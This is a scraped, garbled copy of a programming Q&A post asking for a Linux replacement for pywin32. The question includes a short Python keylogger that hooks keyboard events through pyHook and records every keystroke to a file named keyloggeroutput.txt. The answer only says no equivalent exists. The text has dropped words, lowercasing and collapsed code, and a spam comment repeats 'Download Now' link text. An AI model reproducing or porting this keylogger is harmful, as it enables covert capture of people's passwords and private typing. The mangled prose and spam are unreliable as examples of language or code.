python - What is the Linux equivalent of the pywin32 module? -


i trying port python code windows ubuntu, 1 of modules uses pywin32. know won't run on linux machine, module install replace pywin32 if wanted run python script on linux?

import pyhook, pythoncom, sys, logging  file_log = 'c:/keyloggeroutput.txt'  def onkeyboardevent(event):     logging.basicconfig(filename=file_log, level=logging.debug, format='%(message)s')     chr(event.ascii)     logging.log(10,chr(event.ascii))     return true  hooks_manager = pyhook.hookmanager() hooks_manager.keydown = onkeyboardevent hooks_manager.hookkeyboard() pythoncom.pumpmessages()  

there isn't one. need either port python code platform-independent code or find equivalent replacement provides specific functionality required pywin32.


Comments

  1. Python - What Is The Linux Equivalent Of The Pywin32 Module? - >>>>> Download Now

    >>>>> Download Full

    Python - What Is The Linux Equivalent Of The Pywin32 Module? - >>>>> Download LINK

    >>>>> Download Now

    Python - What Is The Linux Equivalent Of The Pywin32 Module? - >>>>> Download Full

    >>>>> Download LINK MN

    ReplyDelete

Post a Comment

Popular posts from this blog

php - Vagrant up error - Uncaught Reflection Exception: Class DOMDocument does not exist -

vue.js - Create hooks for automated testing -

Add new key value to json node in java -